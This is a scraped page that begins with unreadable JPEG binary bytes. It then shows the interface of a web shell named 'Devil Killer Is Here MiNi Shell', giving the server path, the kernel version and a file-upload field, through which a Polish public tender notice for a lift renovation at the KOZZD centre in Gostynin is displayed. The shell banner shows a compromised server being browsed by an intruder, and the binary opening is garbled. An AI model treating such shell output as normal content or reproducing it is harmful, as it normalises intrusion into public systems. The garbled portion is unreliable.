JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250514/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250514/0023044901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dźwigu osobowo-towarowego w Krajowym Ośrodku Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK ZAPOBIEGANIA ZACHOWANIOM DYSSOCJALNYM</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 147060927</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zalesie 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gostynin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">24 235 71 54</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">24 235 71 55</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@kozzd-gostynin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kozzd-gostynin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dźwigu osobowo-towarowego w Krajowym Ośrodku Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63c662d4-f7d8-4632-9d59-ffe7c618a0ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00230449</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00125528/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dźwigu osobowo-towarowego w Krajowym Ośrodku Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> BIP: http://kozzd-gostynin.bip.eur.pl; Platforma: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">BIP: http://kozzd-gostynin.bip.eur.pl; Platforma: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne które muszą spełniać urządzenia informatyczne w celu korzystania z platformy przetargowej opisane zostały przez Zamawiającego w specyfikacji warunków zamówienia - pkt VIII ppkt 4 wskazanego dokumentu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula dotyczy obowiązku informacyjnego wynikającego z art. 13 RODO Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia Dyrektywy 95/46/WE - znajduje się w dokumentacji postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TPBN/1/2025/G</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zadanie obejmujące przebudowę dźwigu osobowo-towarowego w Krajowym Ośrodku Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie, zgodnie z załączoną do SWZ dokumentacją projektową.<br/>Oferta powinna obejmować kompleksowe wykonanie zadania wraz z dostawą wymaganych materiałów i urządzeń sprecyzowanych w załączonej do dokumentów postępowania, dokumentacji projektowej. <br/>Dokumenty stanowiące załącznik do SWZ, a opisujące przedmiot zamówienia należy traktować, jako wzajemnie wyjaśniające i uzupełaniające w tym znaczeniu, iż w przypadku stwierdzenia jakichkolwiek niejasności lub wieloznaczności wykonania, Wykonawca nie będzie mógł ograniczyć zakresu swojego zobowiązania ani zakresu należytej staranności. <br/>Ewentualne zastosowanie w dokumentach zamówienia nazw własnych poszczególnych materiałów, znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu charakteryzującego produkty lub usługi dostarczane przez konkretnego Wykonawcę, należy traktować je, jako podanie przykładowych pozycji, które każdorazowo należy czytać z dopiskiem „lub inne równoważne o nie gorszych parametrach”. Podanie konkretnych nazw, znaków, patentów lub źródeł stanowi jedynie wyznacznik pożądanego standardu i jakości, które zostaną zastosowane do realizacji zamówienia i należy traktować je jako przykładowe. Oznacza to, że wszędzie tam, gdzie dokumentacja techniczna wskazywałaby w odniesieniu do niektórych materiałów, urządzeń i technologii znaki towarowe lub pochodzenie, w tym w szczególności podana byłaby nazwa własna materiału, urządzenia czy technologii, numer katalogowy lub producent, należy to traktować jako rozwiązanie przykładowe określające standardy, wygląd i wymagania techniczne, a Zamawiający zgodnie z art. 99 ust. 5 Ustawy Pzp, dopuszcza materiały, urządzenia i technologie równoważne. Wszelkie materiały, urządzenia i technologie, pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały, urządzenia i technologie, aby spełniać wymagania stawianie przez Zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Wykonawca może zastosować wskazany lub równoważny, inny wyrób spełniający wymogi techniczne i jakościowe oraz posiadający właściwości użytkowe nie gorsze niż określone w dokumentacji technicznej z preferencją parametrów korzystniejszych spełniających te same wymagania jakościowe, funkcjonalne i techniczne wskazanego oraz posiadające właściwości użytkowe spełniające wymogi określone dla przedmiotu opisanego w dokumentacji technicznej. Wszędzie tam, gdzie przedmiot zamówienia został opisany za pomocą norm, ocen, specyfikacji technicznych i systemów odniesienia, Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powoła się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego. <br/>Zamawiający informuje również, iż wykonanie zadania objętego niniejszym postępowaniem nie wymaga uzyskania decyzji o pozwoleniu na budowę oraz zgłoszenia, o którym mowa w art. 30 Ustawy z dnia 07 lipca 1994r. Prawo budowalne (Dz. U. z 2025r. poz. 418).<br/>Wymagania dodatkowe będące po stronie Wykonawcy dla prowadzonych prac:<br/>1. Zagospodarowanie miejsca wykonywania prac, w tym zabezpieczenie i wygrodzenie miejsca prowadzenia robót przed dostępem osób trzecich, zabezpieczenie przed brudem, roznoszeniem kurzu i pyłu z rozbiórek i prac wykończeniowych oraz zapewnienie spełnienia warunków BHP, zorganizowanie zaplecza budowy – do uzgodnienia z Zamawiającym. <br/>2. Zabezpieczenie instalacji i urządzeń w miejscu wykonywania prac i w jej bezpośrednim otoczeniu, przed ich zniszczeniem lub uszkodzeniem w trakcie wykonywania przedmiotu zamówienia.<br/>3. Dbanie o porządek w miejscu prac oraz utrzymywanie miejsca prac w należytym stanie i porządku oraz w stanie wolnym od przeszkód, a także uporządkowanie miejsca wykonywania prac po ich zakończeniu.<br/>4. Wykonanie wszelkich zabezpieczeń w szczególności przed pożarem, zadymieniem, zalaniem.<br/>5. Przeniesienie lub usunięcie kolidujących z budową materiałów/urządzeń – w porozumieniu z Zamawiającym. <br/>6. Likwidacja kolizji. <br/>7. Ponoszenie pełnej odpowiedzialności za stosowanie i bezpieczeństwo wszelkich działań prowadzonych na terenie Ośrodka, a związanych z wykonaniem przedmiotu zamówienia.<br/>8. Ponoszenie pełnej odpowiedzialności za szkody oraz następstwa nieszczęśliwych wypadków pracowników Wykonawcy i osób trzecich, powstałe w związku z prowadzonymi na terenie Ośrodka pracami, w tym także ruchem pojazdów.<br/>9. Nienaruszanie praw osób trzecich podczas wykonywania robót.<br/>10. Instalowane materiały i urządzenia muszą być nieużywane i fabrycznie nowe oraz muszą być dopuszczone do obrotu i stosowania w budownictwie, a także odpowiadać wymaganiom jakościowym określonym w dokumentacji projektowej. <br/>11. Prace prowadzone będą zgodnie ze specyfikacją i zaleceniami producenta materiałów bądź zastosowanych rozwiązań. <br/>12. Wszystkie odpady powstałe w trakcie prowadzonych prac – w tym demontowane elementy wyeksploatowanego dźwigu są z chwilą przekazania miejsca budowy własnością Wykonawcy i jest on zobowiązany do ich właściwego zakwalifikowania, posegregowania oraz na własny koszt zutylizowania i usunięcia z miejsca prowadzonych prac.<br/>13. Wykonawca zobowiązany będzie do uczestniczenia w wyznaczonych przez Zamawiającego spotkaniach, w celu omówienia spraw związanych z realizacją przedmiotu zamówienia.<br/>14. Wykonawca zobowiązany będzie do prowadzenia prac zgodnie z dostarczoną przez Zamawiającego dokumentacją projektową, zasadami wiedzy technicznej, sztuki budowlanej i obowiązującymi przepisami prawa, a w razie potrzeby konsultowania wszystkich zmian z przedstawicielami Zamawiającego.<br/>15. Wykonawca przygotuje i złoży dokumenty zgłoszeniowe dla zainstalowanego dźwigu do Urzędu Dozoru Technicznego oraz będzie brał udział w dalszych czynnościach odpowiadając za dopuszczenie zainstalowanego dźwigu do użytku przez Urząd Dozoru Technicznego. <br/>16. Zgłaszając zadanie do odbioru Wykonawca oświadczy, że w terminie maksymalnie 31 dni kalendarzowych od daty zgłoszenia do odbioru, będący przedmiotem postępowania dźwig wraz z urządzeniami dodatkowymi zostanie oddany do użytkowania, co potwierdzone zostanie właściwym dokumentem wydanym przez Urząd Dozoru Technicznego, a wszystkie ewentualne braki oraz przeszkody wykazane przez Urząd Dozoru Technicznego zostaną usunięte na koszt Wykonawcy. <br/>17. Wykonawca zobowiązany będzie do przeszkolenia wyznaczonych pracowników Zamawiającego w zakresie eksploatacji oraz obsługi zainstalowanego dźwigu oraz w postępowaniu na wypadek awarii urządzenia do czasu przyjazdu serwisu.<br/>18. Wykonawca przed rozpoczęciem prac dostarczy Zamawiającemu listę osób realizujących zadanie wraz z listą pojazdów, celem identyfikacji. Lista podlega aktualizacji. Osoby spoza listy nie będą wpuszczone na teren Ośrodka. <br/>19. Wykonawca będzie zobowiązany odsunąć od wykonania pracy każdą osobę, która przez swój brak kwalifikacji lub z innego powodu zagrażać może w jakikolwiek sposób należytemu wykonaniu przyszłej umowy w sprawie zamówienia publicznego. <br/>20. Zamawiający umożliwi Wykonawcy prowadzenie prac bez ograniczenia godzin wykonywania tych prac za wyjątkiem prac głośnych, które będzie można wykonywać wyłącznie w godzinach 06:00 – 22:00. <br/>21. W związku z tym, iż prace objęte postępowaniem prowadzone będą na terenie instytucji będącej podmiotem leczniczym, Zamawiający informuje, iż zgodnie z obowiązującymi przepisami prawa na terenie całego Ośrodka obowiązuje całkowity zakaz palenia papierosów. <br/>22. Zamawiający informuje, iż dodatkowe informacje organizacyjne związane z realizacją przedmiotowego postępowania, a prowadzone na terenie naszego Ośrodka, zostaną Wykonawcy przekazane podczas wizji lokalnej miejsca planowanych prac. <br/>23. Wykonawca zobowiązany jest udzielić na wykonanie robót i zastosowane materiały minimum 24- miesięcznej gwarancji licząc od dnia odbioru końcowego zadania. <br/>UWAGA: Zamawiający informuje, iż obiekt w którym będą trwały prace związane z zadaniem jest obiektem czynnym, prowadzącym działalność leczniczą. Dlatego też Wykonawca podejmie wszelkie działania w celu należytego zabezpieczenia miejsca prowadzenia prac – niedopuszczalna jest żadna przerwa w funkcjonowaniu obiektu. <br/>Zamówienie będzie realizowane na zasadach i warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 10 do SWZ - warunki określone w tym dokumencie, który został załączony do specyfikacji warunków zamówienia stanowią jej integralną część. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert określony został przez Zamawiającego w pkt XVIII specyfikacji warunków zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego może ubiegać się Wykonawca, który spełnia warunki określone w art. 112 ust. 2 Ustawy Pzp. <br/>2. W celu oceny zdolności Wykonawcy do należytego wykonania zamówienia, Zamawiający określa warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu w tym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>- Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu w tym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej:<br/>- Warunek ten zostanie spełniony jeżeli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na czas realizacji prac objętych umową, przy czym kwota tego ubezpieczenia nie może być mniejsza niż 300.000,00 złotych. <br/>4) zdolności technicznej lub zawodowej:<br/>- Warunek ten zostanie spełniony jeżeli Wykonawca wykaże się odpowiednim doświadczeniem tj. wykonaniem nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień w zakresie montażu lub wymiany dźwigu osobowo – towarowego w budynku mieszkalnym, wielorodzinnym lub obiekcie użyteczności publicznej wraz z konserwacją i należytym serwisowaniem w okresie gwarancji o wartości co najmniej 120.000,00 złotych brutto każda.<br/>- Warunek ten zostanie spełniony jeżeli Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj.:<br/>- minimum jedną osobą przewidzianą do pełnienia funkcji Kierownika budowy posiadającego uprawnienia w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne równoważne uprawienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa, zgodnie z Ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2025r. poz. 418) wraz z ważnym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego oraz posiadającą co najmniej 3-letnie doświadczenia zawodowe.<br/>- minimum jedną osobą posiadająca uprawienia kwalifikacyjne typu E i D do 1 kV oraz posiadającą co najmniej 3-letnie doświadczenie zawodowe w zakresie instalowanych urządzeń. <br/>3. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/>4. Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą wyrażone w walucie obcej, kwoty te zostaną przeliczone na PLN według średniego kursu PLN w stosunku do walut obcych ogłoszonych przez Narodowy Bank Polski, w dniu wystawienia dokumentu. W przypadku braku publikacji kursów walut Narodowego Banku Polskiego obowiązujących w dniu o którym mowa, zastosowanie ma kurs ostatnio ogłoszony przed tym dniem. <br/>5. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu zgodnie z formułą „spełnia – nie spełnia” w oparciu o dokumenty i oświadczenia złożone przez Wykonawcę, z których będzie jednoznacznie wynikać, że Wykonawca spełnia warunki udziału w postępowaniu. <br/>6. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej Podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Wykonawca, który polega na zdolnościach lub sytuacji Podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych Podmiotów poprzez złożenie wraz z ofertą zobowiązania Podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub złożyć inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych Podmiotów. <br/>Zobowiązanie Podmiotu udostępniającego zasoby potwierdza, że stosunek łączący Wykonawcę z Podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: zakres dostępnych Wykonawcy zasobów Podmiotu udostępniającego zasoby, sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów Podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia, czy i w jakim zakresie Podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <br/>7. Wykorzystanie przez Wykonawcę Podmiotu trzeciego w celu potwierdzenia spełniania warunków udziału w postępowaniu <br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia odbywa się zgodnie z art. 119 Ustawy Pzp. <br/>8. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa Podmiotu udostępniającego zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu 